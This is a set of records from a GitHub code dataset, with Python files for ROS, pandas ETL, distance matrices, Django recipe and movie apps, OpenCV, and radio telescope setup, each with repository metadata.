Euler\nfrom geometry_msgs.msg import PointStamped\n\n\nclass Observer(object):\n def __init__(self, state_topic=\"calibrated_state\", imu_topic=\"calibrated_imu\", location_topic=\"calibrated_location\"):\n\n self.state_pub = rospy.Publisher(state_topic, Location, queue_size=1)\n\n imu_sub = rospy.Subscriber(imu_topic, Euler, self.imu_callback)\n location_sub = rospy.Subscriber(location_topic, PointStamped, self.location_callback)\n\n self.x = 0.0\n self.y = 0.0\n self.theta = 0.0\n\n \n def location_callback(self, location_data):\n self.x = location_data.point.x\n self.y = location_data.point.y\n\n\n def imu_callback(self, imu_data):\n self.theta = imu_data.heading\n msg = Location()\n\n msg.pose.x = self.x\n msg.pose.y = self.y\n msg.pose.theta = self.theta\n\n self.state_pub.publish(msg)\n\nif __name__ == '__main__':\n rospy.init_node(\"observer\")\n controller = Observer()\n rospy.spin()\n","repo_name":"VasuAgrawal/BarBot","sub_path":"Controller/src/barbot/scripts/Observer.py","file_name":"Observer.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31391932795","text":"import pandas as pd \nimport os\n\n\nclass DataETL():\n # initialize class and its properties\n def __init__(self):\n self.df_users = None\n self.df_tickets = None\n self.df_organization = None \n self.df_combined = None\n self.dataframe_list = None\n pd.set_option('display.max_columns', None)\n\n # load data from file\n def data_extract(self):\n dir_path=os.path.dirname(os.path.realpath(__file__))\n users_path=os.path.join(dir_path, 'users.json')\n tickets_path = os.path.join(dir_path, 'tickets.json')\n organizations_path = 
os.path.join(dir_path, 'organizations.json')\n \n self.df_users = pd.read_json(users_path)\n self.df_tickets = pd.read_json(tickets_path)\n self.df_organizations = pd.read_json(organizations_path)\n self.dataframe_list = [self.df_users, self.df_tickets, self.df_organizations]\n\n # add suffix to the column names \n def df_add_suffix(self):\n self.df_users = self.df_users.add_suffix('_users')\n self.df_tickets = self.df_tickets.add_suffix('_tickets')\n self.df_organizations = self.df_organizations.add_suffix('_orgs')\n\n # merge all three dataframe on their common keys \n def combine_dataframe(self):\n # combine user and organization on organization id (use outer merge to )\n df_user_org = pd.merge(self.df_users, self.df_organizations, left_on='organization_id_users', right_on='_id_orgs', how='outer')\n # combine tickets on submitter id \n self.df_combined = pd.merge(df_user_org, self.df_tickets, left_on='_id_users', right_on='submitter_id_tickets', how='outer')\n # convert floating data type to strings \n for col in self.df_combined.columns:\n if pd.api.types.is_float_dtype(self.df_combined[col]):\n self.df_combined.loc[self.df_combined[col].notna(), col] = self.df_combined.loc[self.df_combined[col].notna(), col].astype(int).astype(str)\n # flattern lists inside columns \n self.df_combined['tags_users'] = self.df_combined['tags_users'].apply(lambda x: ', '.join(map(str, x)) if isinstance(x, list) else str(x))\n return self.df_combined \n # dataETL\n def data_ETL(self):\n self.data_extract()\n self.df_add_suffix()\n self.df_combined = self.combine_dataframe()\n return self.df_combined\n # def data_search(self):\n # self.search_function(self.df_combined)\n\n # showing data frame\n def show_data(self):\n print(self.df_combined)\n\n\nmain = DataETL()\nmain.data_ETL()\n#main.show_data()","repo_name":"111userNotFound111/SearchEngineProjectFinal","sub_path":"my_package/data_ETL.py","file_name":"data_ETL.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6779161736","text":"import pandas as pd\nfrom geopy.geocoders import Nominatim\nimport pickle\nfrom geopy.distance import geodesic\nimport numpy as np\nimport requests\nimport json\nprint ('Importing Libraries')\ndf=pd.read_csv(\"cordinates.csv\")\n\nlist_of_places = []\n\nclass Node():\n\tdef __init__(self,name,nodeid):\n\t\tself.children = dict()\n\t\tself.node_child = dict()\n\t\tself.name = name\n\t\tself.time = 0\n\t\tself.latitude = 0\n\t\tself.longitude = 0\n\t\tself.nodeid = nodeid\n\n\tdef add_children(self,new_location,distance):\n\t\tif len(self.children)<5:\n\t\t\tself.children[new_location] = distance\n\t\t\tself.node_child[new_location] = root.node_child[new_location]\n\t\telse:\n\t\t\ttemp=str(max(self.children,key=self.children.get))\n\t\t\tif self.children[temp]>distance:\n\t\t\t\tdel(self.children[temp])\n\t\t\t\tdel(self.node_child[temp])\n\t\t\t\tself.children[new_location] = distance\n\t\t\t\tself.node_child[new_location] = root.node_child[new_location]\n\t\t\telse:\n\t\t\t\tpass;\n\n\n\n\tdef add_root_child(self,new_location,nodeid):\n\t\tself.children[new_location] = (0,0)\n\t\t#Child Node is created\n\t\tself.node_child[new_location] = Node(new_location,nodeid)#Node Constructor Called\n\nroot = Node('Root',-1)#Dummy Node\n\nfor i in range(len(df)):\n\tlist_of_places.append(df.loc[i]['location'])\n\t#print (df.loc[i]['location'])\n\troot.add_root_child(df.loc[i]['location'],i)\n\nfor i in 
list_of_places:\n\tprint(i)\n\tfor j in list_of_places:\n\t\tif i==j:\n\t\t\tpass\n\t\telse:\n\n\t\t\tlat_i = df[df['location']==i]['latitude']\n\t\t\tlong_i = df[df['location']==i]['longitude']\n\n\t\t\tlat_j = df[df['location']==j]['latitude']\n\t\t\tlong_j = df[df['location']==j]['longitude']\n\n\t\t\tlon_i = long_i.tolist()\n\t\t\tlon_j = long_j.tolist()\n\n\t\t\tlati = lat_i.tolist()\n\t\t\tlatj = lat_j.tolist()\n\n\n\n\t\t\t#x=(lati[0],lon_i[0])\n\t\t\t#y=(latj[0],lon_j[0])\n\t\t\t#print (x,':',y)\n\t\t\t# key = 'Aq8LlcKLQyS0vyUEhI7Zg-KXeH7SZeJ9o8vJtrZ92_fi_NCcS3W8FY_jgh53RdaI'\n\t\t\t# print( \"Sending request to bing maps API\" )\n\t\t\t# URL = 'https://dev.virtualearth.net/REST/v1/Routes/DistanceMatrix?origins='\n\t\t\t# URL = URL + str(lati[0]) + ',' + str( lon_i[0]) + '&destinations=' + str( latj[0] ) + ',' + str(lon_j[0] ) + '&travelMode=driving&timeUnit=seconds' + '&key=' + key\n\t\t\t#\n\t\t\t# data = requests.get( URL ).text\n\t\t\t# json_data = json.loads( data )\n\t\t\t# print(\"done requesting\")\n\t\t\t# obj = json_data['resourceSets'][0]['resources'][0]['results'][0]\n\t\t\t# dis = obj['travelDistance']\n\n\t\t\tx = (lati[0], lon_i[0])\n\t\t\ty = (latj[0], lon_j[0])\n\t\t\t# print (x,':',y)\n\t\t\tdis = geodesic( x, y ).miles\n\n\t\t\t#root.node_child[i].add_children( j, dis )\n\n\t\t\troot.node_child[i].add_children(j,dis)\n\n\t#print(root.node_child[i].children)\n\n\n\nadj_mat = []\n\nfor i in range(len(list_of_places)):\n\tX = root.node_child[list_of_places[i]].children\n\ty = np.zeros(len(list_of_places)).tolist()\n\n\tfor keys,value in X.items():\n\t\tkey_id = list_of_places.index(keys)\n\t\ty[key_id] = value\n\tadj_mat.append(y)\n\n\nfor i in range(len(adj_mat)):\n\tfor j in range(len(adj_mat)):\n\t\tif adj_mat[i][j] > 0:\n\t\t\tadj_mat[j][i] = adj_mat[i][j]\n\n\nprint ('Saving the adjancy matrix........')\nimport pickle\nwith open('adj_mat.pkl','wb') as fp:\n\tpickle.dump(adj_mat,fp,-1)\n\n\n\n\n\n\n\n#root.node_child[j].add_children(i,dis,10)\n","repo_name":"Atishya-Gupta/Optimal-Path-Finder-in-Hyderabad","sub_path":"Computing Distance.py","file_name":"Computing Distance.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72186673128","text":"class Character(object):\n def __init__(self, name, inventory, abilities, stats, health):\n self.name = name\n self.inventory = inventory\n self.abilities = abilities\n self.stats = stats\n self.health = health\n\n def attack(self, Enemy):\n Enemy.damage()\n self.health -= 25\n def inventory(self, health):\n self.health()\n print(\"You have\")\n\nplayer = Character(\"Willy\", \"Gun\", \"Fast Sprint\", \"Kills\", \"100\",)\n\n\nprint(player.name)\nprint(player.inventory)\nprint(player.abilities)\nprint(player.stats)\nprint(player.health)\nprint(player.attack)","repo_name":"ioqv/CSE","sub_path":"Edgar Lopez -Class Character.py","file_name":"Edgar Lopez -Class Character.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2924426813","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.http import HttpResponseRedirect\nfrom stormapp.deadbodies.views import home_view, about_storm, about_team, sample_map_view, retrieve_body, report_dead_body, view_all_dead_body\nfrom stormapp.reliefops.views import view_all_relief_ops\nfrom django.contrib import admin\nfrom django.contrib.staticfiles.urls import 
staticfiles_urlpatterns\nfrom django.conf import settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n)\n\n# deadbodies\nurlpatterns += patterns('',\n url(r'^index/$', home_view),\n url(r'^view_map/$', sample_map_view),\n url(r'^report/$', report_dead_body),\n url(r'^view_all/$', view_all_dead_body),\n url(r'^retrieve/$', view_all_dead_body),\n url(r'^about/storm/$', about_storm),\n url(r'^about/team/$', about_team),\n url(r'^$', lambda x: HttpResponseRedirect('/index/')),\n)\n\n# reliefops\nurlpatterns += patterns('',\n url(r'^relief/$', view_all_relief_ops),\n)\n\nurlpatterns += staticfiles_urlpatterns()\n\nurlpatterns += patterns('',\n url(r'^media/(?P.*)$', 'django.views.static.serve', {\n 'document_root': settings.MEDIA_ROOT,\n }),\n )","repo_name":"njncalub/storm","sub_path":"stormapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4023028131","text":"import cv2 as cv\nimport numpy as np\nimg=cv.imread('pics/gnr.jpg')\nblank=np.ones((img.shape[0],img.shape[1],3),dtype='uint8')\nblank[0:250,250:500]=0,0,0\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\ncv.imshow('gray',gray)\nedge=cv.Canny(img,50,75)\ncv.imshow('edge',edge)\nblur=cv.GaussianBlur(img,(5,5),cv.BORDER_DEFAULT)\nbluredge=cv.Canny(blur,50,75)\ncv.imshow('bluredge',bluredge)\ncontours,hierarchy=cv.findContours(edge,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\ncontoursblur,hierarchy=cv.findContours(bluredge,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\nprint(len(contours))\nprint(len(contoursblur))\nret,thresh=cv.threshold(gray,100,125,cv.THRESH_BINARY)\ncontoursthrs,hierarchy=cv.findContours(thresh,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)\nprint(len(contoursthrs))\ncv.imshow('thresh',thresh)\ncv.drawContours(blank,contoursthrs,-1,(0,255,0),1)\ncv.imshow('drawnContours',blank)\ncv.waitKey(0)","repo_name":"anirbanhati/cv2programming","sub_path":"contour.py","file_name":"contour.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23777080859","text":"from HelperClasses.User import User\n\n\nclass TweetData:\n \"\"\"Extends the Tweet class with additional functionality and properties\"\"\"\n\n def __init__(self, tweet):\n self.baseData = tweet\n self.text = \"\"\n self.getAllText()\n self.comments = []\n self.getcomments()\n self.user = User(tweet)\n\n def getAllText(self):\n try:\n self.text = self.baseData.retweeted_status.full_text\n except:\n self.text = self.baseData.full_text\n\n \"\"\"Gets all comments for this tweet\"\"\"\n def getcomments(self):\n entities = self.baseData.entities.get('hashtags')\n self.comments.append(\"test\")\n","repo_name":"benwschulz/TrendScraper","sub_path":"HelperClasses/TweetData.py","file_name":"TweetData.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16440294152","text":"# Ku-band H2CO 2 cm (and friends)\n# keywords defined at www.gb.nrao.edu/~fghigo/gbtdoc/config/configparams_rev1.doc\n#\n# CONFIGURATION:\n# Bandwidth Polarization Level Number of Number of Lags - Approximate Resolution\n# (MHz) Cross-Products Sampling Spectral Beams Low Medium High\n# BW Pol Lev Windows Beams Channels / resolution\n# 50 No 9 4 2 4096 - 12.2070 kHz 4096 - 12.2070 kHz 4096 - 12.2070 kHz\n\nreceiver = 'Rcvr12_18' # select Ku-band 
receiver\nbeam = 'B12' # use two beams\nobstype = 'Spectroscopy'\nbackend = 'VEGAS'\nswmode = \"tp\" # set switching scheme (tp(total power with cal), tp_nocal, sp(switched power with cal), sp_nocal )\nswtype = \"none\" # for frequency switching; not used for tp mode\nswper = 1.0 # one second cycle for switching\nswfreq = 0.0, 0.0 # for freq switching\ntint = 0.5 # integration time (for 4 quadrants, 1.2-40 sec. Important to avoid smearing)\nvlow = 0\nvhigh = 0\nvframe = \"lsrk\" # LSR - kinematic is the \"normal\" definition (don't use dynamic)\nvdef = \"Radio\" # radio (optical is also acceptable, but not the norm for Galactic observations)\nnoisecal = \"lo\"\npol = \"Circular\" # should this be linear?\nnchan = \"high\"\nvegas.vpol='self'\nrestfreq = [ {\"restfreq\": 14488.479, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 14511., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 14465., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 13778.80, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 13801., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 13756., 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 14151.61, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 14105.61, 'bandwidth': 23.44, \"res\":5.7, \"deltafreq\": 0},\n             {\"restfreq\": 12625., 'bandwidth': 1250., \"res\":92.0, \"deltafreq\": 0},\n           ]\n","repo_name":"adamginsburg/GBT15B-129_CMZ_H2CO","sub_path":"observing_scripts/H2CO_2cm_KUSetup_GC.py","file_name":"H2CO_2cm_KUSetup_GC.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30394209163","text":"import torch\nimport numpy as np\nfrom collections import OrderedDict\nfrom my_bert_model import BertConfig, BertModel, BertGenerationEncoderDecoder, BertGenerationEncoder, BertGenerationDecoder\nfrom torch.nn import Parameter\n\nDEVICE = 'cpu'\n\ndef load_my_state_dict(model, state_dict):\n    own_state = model.state_dict()\n    for name, param in state_dict.items():\n        if name not in own_state:\n            continue\n        if isinstance(param, Parameter):\n            # backwards compatibility for serialized parameters\n            param = param.data\n        own_state[name].copy_(param)\n\n\nconfig = BertConfig()\nmodel_encoder = BertGenerationEncoder(config)\nconfig.is_decoder = True\nmodel_decoder = BertGenerationDecoder(config)\nmy_model = BertGenerationEncoderDecoder(model_encoder, model_decoder)\nkeys = my_model.state_dict()\n\n'''\nprint(type(keys))\nfor key in keys:\n    #print(keys[key], key, '\\n')\n    print(key, '\\n')\n'''\n\ninput_ids = torch.tensor([[1, 1, 0, 3, 7], [2, 4, 6, 8, 10]]).to(DEVICE)\noutputs = my_model(input_ids=input_ids, decoder_input_ids=input_ids)\n\n\n'''\nconfig = BertConfig()\nconfig.is_decoder = True\nmodel = torch.load('bert_data/bert-base-uncased-pytorch_model.bin')\nmodel2 = OrderedDict([k.replace('LayerNorm.gamma', 'LayerNorm.weight'), v] for k, v in model.items())\nmodel = OrderedDict([k.replace('LayerNorm.beta', 'LayerNorm.bias'), v] for k, v in model2.items())\nmy_model = BertForSequenceClassification(config, num_labels=2)\nkeys = my_model.state_dict()\nprint(type(keys))\nfor key in keys:\n    #print(keys[key], key, '\\n')\n    print(key, '\\n')\n\n#load_my_state_dict(my_model, state_dict=model)\n#keys = my_model.state_dict()\n#print(type(keys))\n#for key in keys:\n    #print(keys[key], key, '\\n')\n    #print(key[0], 
'\\n')\n'''","repo_name":"zhengfengL/mybert","sub_path":"src/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12956695674","text":"import base64\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.files.base import ContentFile\nfrom rest_framework import serializers, status\n\nfrom recipe.models import (Favorites, Ingredient, IngredientAmount, Recipe,\n                           ShoppingCart, Subscription, Tag)\n\nUser = get_user_model()\n\n\nclass UserSerializer(serializers.ModelSerializer):\n    \"\"\"Serializer for the custom user model\"\"\"\n    is_subscribed = serializers.SerializerMethodField()\n\n    class Meta:\n        model = User\n        fields = [\n            'id', 'username', 'email', 'first_name',\n            'last_name', 'is_subscribed', 'password'\n        ]\n        read_only_fields = ['id', 'is_subscribed']\n        extra_kwargs = {\n            'password': {'write_only': True},\n        }\n        depth = 1\n\n    def get_is_subscribed(self, obj):\n        \"\"\"Computed field:\n        whether the current user is subscribed\n        to the requested user\n        \"\"\"\n\n        if hasattr(self.context['request'], 'user'):\n            user = self.context['request'].user\n        else:\n            user = None\n\n        if (user is None or not user.is_authenticated):\n            return False\n        return (user.subscriber.filter(to_follow=obj).count() > 0)\n\n    def create(self, validated_data):\n        \"\"\"Override user creation\n        to hash the password\n        \"\"\"\n\n        user = User(\n            email=validated_data['email'],\n            username=validated_data['username'],\n            first_name=validated_data['first_name'],\n            last_name=validated_data['last_name'],\n        )\n        user.set_password(validated_data['password'])\n        user.save()\n        return user\n\n\nclass TagSerializer(serializers.ModelSerializer):\n    \"\"\"Tag serializer\"\"\"\n    class Meta:\n        model = Tag\n        fields = '__all__'\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n    \"\"\"Ingredient serializer\"\"\"\n    class Meta:\n        model = Ingredient\n        fields = '__all__'\n\n\nclass IngredientAmountSerializer(serializers.ModelSerializer):\n    \"\"\"Serializer for the intermediate model\n    that exposes the amount of an ingredient in a recipe\n    \"\"\"\n    id = serializers.IntegerField(source='ingredient.id')\n    name = serializers.ReadOnlyField(source='ingredient.name')\n    measurement_unit = serializers.ReadOnlyField(\n        source='ingredient.measurement_unit'\n    )\n\n    class Meta:\n        model = IngredientAmount\n        fields = ('id', 'name', 'measurement_unit', 'amount')\n\n\n# From gist.github.com/yprez/7704036\nclass Base64ImageField(serializers.ImageField):\n    \"\"\"Serializer field that decodes an image from base64\"\"\"\n\n    def to_internal_value(self, data):\n        if ((isinstance(data, str) or isinstance(data, bytes))\n                and data.startswith('data:image') and (';base64,' in data)):\n            # base64 encoded image - decode\n            format, imgstr = data.split(';base64,') # format ~= data:image/X,\n            ext = format.split('/')[-1] # guess file extension\n\n            try:\n                decoded_file = base64.b64decode(imgstr)\n            except TypeError:\n                self.fail('invalid_image')\n\n            data = ContentFile(decoded_file, name=imgstr[12] + '.' + ext)\n\n        return super(Base64ImageField, self).to_internal_value(data)\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n    \"\"\"Recipe serializer\"\"\"\n    author = UserSerializer(read_only=True)\n    tags = serializers.PrimaryKeyRelatedField(\n        queryset=Tag.objects.all(),\n        many=True\n    )\n    ingredients = IngredientAmountSerializer(\n        many=True,\n        source='ingredient_in_recipe_amount'\n    )\n    image = Base64ImageField()\n    name = serializers.CharField(max_length=200)\n    cooking_time = serializers.IntegerField(min_value=1)\n\n    is_favorited = serializers.IntegerField(\n        min_value=0,\n        max_value=1,\n        default=0,\n        required=False,\n        read_only=True\n    )\n    is_in_shopping_cart = serializers.IntegerField(\n        min_value=0,\n        max_value=1,\n        default=0,\n        required=False,\n        read_only=True\n    )\n\n    class Meta:\n        model = Recipe\n        fields = (\n            'id', 'tags', 'author', 'ingredients',\n            'is_favorited', 'is_in_shopping_cart',\n            'name', 'image', 'text', 'cooking_time')\n        read_only_fields = ['id', 'author',\n                            'is_favorited', 'is_in_shopping_cart']\n\n    def create(self, validated_data):\n        \"\"\"Overridden create:\n        nested serializers need explicit handling\n        \"\"\"\n\n        tags_list = validated_data.pop('tags')\n        ingredient_list = validated_data.pop('ingredient_in_recipe_amount')\n        instance = super().create(validated_data)\n\n        for tag in tags_list:\n            instance.tags.add(tag)\n        for ing in ingredient_list:\n            ing_am = IngredientAmount(\n                recipe=instance,\n                ingredient=Ingredient.objects.get(\n                    id=ing.get('ingredient').get('id')\n                ),\n                amount=ing.get('amount')\n            )\n            ing_am.save()\n        return instance\n\n    def update(self, instance, validated_data):\n        \"\"\"Overridden update:\n        nested serializers must be updated separately\n        \"\"\"\n\n        tags_list = validated_data.pop('tags')\n        ingredient_list = validated_data.pop('ingredient_in_recipe_amount')\n        instance = super().update(instance, validated_data)\n\n        existing_tags = instance.tags.all()\n        for tag in existing_tags:\n            if tag not in tags_list:\n                instance.tags.remove(tag)\n        for tag in tags_list:\n            if tag not in existing_tags:\n                instance.tags.add(tag)\n\n        existing_ing = instance.ingredients.all()\n        for ing in existing_ing:\n            if ing not in ingredient_list:\n                IngredientAmount.objects.get(\n                    recipe=instance,\n                    ingredient=ing\n                ).delete()\n        for ing in ingredient_list:\n            ing_am, _ = IngredientAmount.objects.get_or_create(\n                recipe=instance,\n                ingredient=Ingredient.objects.get(\n                    id=ing.get('ingredient').get('id')\n                ),\n                amount=ing.get('amount')\n            )\n        return instance\n\n    def to_representation(self, instance):\n        \"\"\"Overridden representation:\n        nested serializers need processing for output\n        \"\"\"\n\n        response = super().to_representation(instance)\n        tag_list = []\n        for tag in instance.tags.all():\n            tag_list.append(TagSerializer(tag).data)\n        response['tags'] = tag_list\n\n        response['image'] = instance.image.url\n\n        user = self.context['request'].user\n\n        if (not user.is_authenticated):\n            response['is_favorited'] = False\n            response['is_in_shopping_cart'] = False\n        else:\n            response['is_favorited'] = user.fav_list.filter(\n                recipe=instance).count() > 0\n            response['is_in_shopping_cart'] = user.cart_list.filter(\n                recipe=instance).count() > 0\n\n        return response\n\n\nclass RecipeShortenedToDisplaySerializer(serializers.ModelSerializer):\n    \"\"\"Shortened recipe serializer for display\"\"\"\n    class Meta:\n        model = Recipe\n        fields = ('id', 'name', 'image', 'cooking_time')\n\n\nclass SubscriptionListToDisplaySerializer(UserSerializer):\n    \"\"\"Subscription list serializer\"\"\"\n    recipes_count = serializers.IntegerField(\n        default=0,\n        read_only=True\n    )\n    recipes = RecipeShortenedToDisplaySerializer(\n        read_only=True,\n        many=True\n    )\n    is_subscribed = serializers.BooleanField(read_only=True)\n\n    class Meta:\n        model = User\n        fields = [\n            'email', 'id', 'username', 'first_name', 'last_name',\n            'is_subscribed', 'recipes', 'recipes_count'\n        ]\n\n    def to_representation(self, instance):\n        \"\"\"Overridden representation:\n        nested serializers need processing for output\n        \"\"\"\n        lim = self.context.get('recipes_limit')\n\n        response = super().to_representation(instance)\n        response['recipes_count'] = instance.user_recipes.all().count()\n\n        recipe_list = []\n\n        if lim is not None:\n            recipe_set = instance.user_recipes.all()[:lim]\n        else:\n            recipe_set = instance.user_recipes.all()\n        for recipe in recipe_set:\n            recipe_list.append(RecipeShortenedToDisplaySerializer(recipe).data)\n        response['recipes'] = recipe_list\n\n        return response\n\n\nclass SubscriptionSerializer(serializers.ModelSerializer):\n    \"\"\"Subscription serializer\"\"\"\n    class Meta:\n        model = Subscription\n        fields = ('user', 'to_follow')\n\n    def validate(self, data):\n        if (data['user'] == data['to_follow']):\n            raise serializers.ValidationError(\n                'You cannot subscribe to yourself.',\n                status.HTTP_400_BAD_REQUEST\n            )\n        if (data['user'].subscriber.filter(\n                to_follow=data['to_follow']).count() > 0):\n            raise serializers.ValidationError(\n                'You are already subscribed to this user.',\n                status.HTTP_400_BAD_REQUEST\n            )\n        return data\n\n    def to_representation(self, instance):\n        \"\"\"Overridden representation\"\"\"\n\n        response = super().to_representation(instance)\n        response['to_follow'] = SubscriptionListToDisplaySerializer(\n            instance.to_follow\n        ).data\n\n        return response\n\n\nclass FavoritesSerializer(serializers.ModelSerializer):\n    \"\"\"Favorites serializer\"\"\"\n    class Meta:\n        model = Favorites\n        fields = '__all__'\n\n    def validate(self, data):\n        \"\"\"Overridden to enforce uniqueness\"\"\"\n        if (data['user'].fav_list.filter(\n                recipe=data['recipe']).count() > 0):\n            raise serializers.ValidationError(\n                'You have already added this recipe to favorites.',\n                status.HTTP_400_BAD_REQUEST\n            )\n        return data\n\n    def to_representation(self, instance):\n        \"\"\"Overridden representation\"\"\"\n        return RecipeShortenedToDisplaySerializer(instance.recipe).data\n\n\nclass ShoppingCartSerializer(serializers.ModelSerializer):\n    \"\"\"Shopping cart serializer\"\"\"\n    class Meta:\n        model = ShoppingCart\n        fields = '__all__'\n\n    def validate(self, data):\n        \"\"\"Overridden to enforce uniqueness\"\"\"\n        if (data['user'].cart_list.filter(\n                recipe=data['recipe']).count() > 0):\n            raise serializers.ValidationError(\n                'You have already added this recipe to the shopping cart.',\n                status.HTTP_400_BAD_REQUEST\n            )\n        return data\n\n    def to_representation(self, instance):\n        \"\"\"Overridden representation\"\"\"\n        return RecipeShortenedToDisplaySerializer(instance.recipe).data\n","repo_name":"malyshevadv/foodgram-project-react","sub_path":"backend/foodgram/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":12256,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12032973885","text":"import datetime\n\nfrom django import forms\nfrom django.urls import reverse\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Fieldset, Submit, Field, 
HTML\nfrom crispy_forms.bootstrap import (\n FormActions,\n FieldWithButtons,\n PrependedText,\n TabHolder,\n Tab\n)\nfrom haystack.forms import SearchForm\n\nfrom .models import MovieInCollection, Collection\n\n\nclass BetterDateTimeInput(forms.DateTimeInput):\n input_type = 'datetime'\n\n def __init__(self, *args, **kwargs):\n forms.DateTimeInput.__init__(self, *args, **kwargs)\n\n\nclass CollectionForm(forms.ModelForm):\n class Meta:\n model = Collection\n fields = ['title']\n\n def __init__(self, *args, **kwargs):\n super(CollectionForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = \"form-horizontal\"\n self.helper.label_class = 'col-3'\n self.helper.field_class = 'col-9'\n self.helper.layout = Layout(\n 'title',\n FormActions(\n Submit(\"submit\", \"Create\")\n )\n )\n\n\nclass MovieForm(forms.ModelForm):\n class Meta:\n model = MovieInCollection\n fields = ['title', 'date', 'tags', 'collection']\n\n title = forms.CharField()\n jstags = forms.CharField(label=\"Tags\", required=False)\n imdb_id = forms.CharField(required=False)\n date = forms.DateTimeField(\n initial=datetime.datetime.now,\n widget=BetterDateTimeInput)\n\n def __init__(self, request, *args, **kwargs):\n super(MovieForm, self).__init__(*args, **kwargs)\n\n self.fields[\"collection\"].queryset = Collection.objects.filter(\n user=request.user)\n\n self.helper = FormHelper()\n self.helper.form_class = \"form-horizontal\"\n self.helper.help_text_inline = True\n self.helper.label_class = 'col-3'\n self.helper.field_class = 'col-9'\n self.helper.attrs['autocomplete'] = 'off'\n self.helper.html5_required = True\n self.helper.layout = Layout(\n Field(\n 'title',\n css_class=\"form-control-lg movie-title-typeahead\"),\n PrependedText(\n 'date',\n '',\n css_class=\"input-medium\"),\n Field('tags', type=\"hidden\"),\n Field(\n 'jstags',\n css_class=\"tagManager\",\n placeholder=\"Tag\"),\n Field('collection', css_class=\"input-medium\"),\n Field(\n 'imdb_id',\n css_class=\"movie-imdb_id-typeahead input-small\"),\n FormActions(\n Submit(\"submit\", \"Add\")\n )\n )\n\n\nclass MovieEditForm(MovieForm):\n def __init__(self, *args, **kwargs):\n super(MovieEditForm, self).__init__(*args, **kwargs)\n\n instance = kwargs['instance']\n self.fields['title'].initial = instance.movie.title\n self.fields['imdb_id'].initial = instance.movie.imdb_id\n self.fields['date'].initial = instance.date\n tag_names = [x.name for x in instance.tags.all()]\n self.fields['jstags'].initial = \",\".join(tag_names)\n\n side_effect_title = \"These affects to all movie items.\"\n side_effect_message = \"If movie IMDB ID or title is modified \" \\\n \"then all related 'watch dates' or related \" \\\n \"collections are also changed.\"\n\n side_effect_alert = HTML(\n '
<div class=\"alert alert-block\">' +\n            '<strong>' +\n            side_effect_title +\n            '</strong><br/>' +\n            side_effect_message +\n            '</div>'\n        )\n\n        cancel_url = reverse('detail-movie', args=(instance.id,))\n\n        self.helper.layout = Layout(\n            TabHolder(\n                Tab(\n                    'Movie item',\n                    PrependedText(\n                        'date',\n                        '',\n                        css_class=\"input-medium\"\n                    ),\n                    Field('collection', css_class=\"input-medium\"),\n                    Field('tags', type=\"hidden\"),\n                    Field(\n                        'jstags',\n                        css_class=\"input-small tagManager\",\n                        placeholder=\"Tag\"),\n                ),\n                Tab(\n                    'Movie',\n                    side_effect_alert,\n                    Field(\n                        'title',\n                        css_class=\"input-xlarge movie-title-typeahead\"),\n                    Field(\n                        'imdb_id',\n                        css_class=\"movie-imdb_id-typeahead input-small\"),\n                )\n            ),\n            FormActions(\n                Submit(\"submit\", \"Save\"),\n                HTML(\n                    '<a class=\"btn\" href=\"' + cancel_url + '\">Cancel</a>')\n            )\n        )\n\n\nclass ImportForm(forms.Form):\n    class Meta:\n        layout = (\n            Fieldset(\"Import movies from CSV\", 'data'),\n        )\n    data = forms.CharField(widget=forms.Textarea)\n\n    def __init__(self, *args, **kwargs):\n        super(ImportForm, self).__init__(*args, **kwargs)\n        self.helper = FormHelper()\n        self.helper.form_class = \"form-horizontal\"\n        self.helper.label_class = 'col-3'\n        self.helper.field_class = 'col-9'\n        self.helper.layout = Layout(\n            Fieldset(\n                'Import',\n                'data',\n                FormActions(\n                    Submit(\"submit\", \"Import\")\n                )\n            